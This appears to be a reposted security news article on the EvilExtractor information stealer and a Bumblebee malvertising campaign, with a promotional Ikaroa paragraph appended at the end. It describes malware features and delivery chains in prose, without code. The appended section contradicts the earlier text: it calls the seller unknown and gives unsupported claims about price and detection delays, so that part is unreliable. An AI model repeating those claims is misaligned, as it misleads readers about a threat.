A new all-in-one stealth malware called EvilExtractor (also spelled Evil Extractor) is marketed for sale to other threat actors to steal data and files from Windows systems.
“It includes several modules that work through an FTP service,” said Cara Lin, a researcher at Fortinet FortiGuard Labs. “It also contains environment verification and anti-VM features. Its main goal appears to be to steal data and browser information from compromised endpoints and then upload it to the attacker’s FTP server.”
The network security firm said it saw an increase in attacks spreading the malware in the wild in March 2023, with most victims located in Europe and the United States. an information thief.
The attack tool is sold by an actor named Kodex on cybercrime forums such as Cracked dating back to October 22, 2022. It is continuously updated and packaged in various modules to hijack system metadata, passwords, and cookies from various web browsers as well as logging keystrokes and even acting as ransomware by encrypting files on the target system.
The malware is also said to have been used as part of a phishing email campaign detected by the company on March 30, 2023. The emails trick recipients into launching an executable that pretends to be to PDF document under the pretense of confirming your “account details”. “
The “Account_Info.exe” binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch EvilExtractor. The malware, in addition to collecting files, can also activate the webcam and capture screenshots.
“EvilExtractor is being used as a complete information stealer with multiple malicious functions, including ransomware,” Lin said. “Its PowerShell script can evade detection in a .NET loader or PyArmor. In a very short time, its developer has updated several features and increased its stability.”
The findings come as the Secureworks Counter Threat Unit (CTU) detailed a malicious advertising and SEO poisoning campaign being used to deliver the Bumblebee malware loader via trojanized installers of legitimate software.
Bumbleebee, first documented a year ago by Google’s threat analysis group and Proofpoint, is a modular loader that spreads primarily through phishing techniques. It is suspected to have been developed by actors associated with the Conti ransomware operation as a replacement for BazarLoader.
Learn how to stop ransomware with real-time protection
Join our webinar and learn how to stop ransomware attacks with real-time MFA and service account protection.
Save my seat!
The use of SEO poisoning and malicious ads to redirect users searching for popular tools such as ChatGPT, Cisco AnyConnect, Citrix Workspace and Zoom to rogue websites hosting tainted installers has witnessed an increase in months after Microsoft started blocking macros by default from downloaded Office files. from the internet
In an incident described by the cybersecurity firm, the threat actor used Bumblebee malware to gain an entry point and move laterally after three hours to deploy Cobalt Strike and legitimate remote access software such as AnyDesk and Dameware. Eventually, the attack was interrupted before moving into the final ransomware stage.
“To mitigate this and similar threats, organizations should ensure that software installers and updates are only downloaded from known and trusted websites,” Secureworks said. “Users should not have privileges to install software and run scripts on their computers.”
Source link
Ikaroa, a full stack tech company, is warning Windows users to watch out for a sophisticated new stealing software program, dubbed the “EvilExtractor”, that has recently surfaced on the dark web. The EvilExtractor is specifically designed to exploit Windows systems and steal sensitive data, including contact information, financial accounts, email addresses and passwords.
The worrying new tool is reportedly being sold for as little as $10 and has been designed with advanced obfuscation techniques, meaning it is hard to detect by antivirus software or cybersecurity teams. It has been estimated that it could take months for certain software updates to become available that can detect and thwart the threat of the EvilExtractor.
The outfit behind the creation of the EvilExtractor is currently unknown, as it is being distributed through multiple dark web portals that are difficult to track. The software has also been reported to come in multiple versions, targeting different language variants of Windows operating systems.
At Ikaroa, we are deeply concerned about the potential repercussions the EvilExtractor might have in the cybersecurity arena. In order to mitigate the potential losses that might be inflicted by this new threat, we urge all Windows users to be more vigilant while surfing the internet, and to make sure that they are running the latest security updates. Additionally, we recommend all users keep an eye out for any suspicious-looking emails which may include malicious links or attachments.
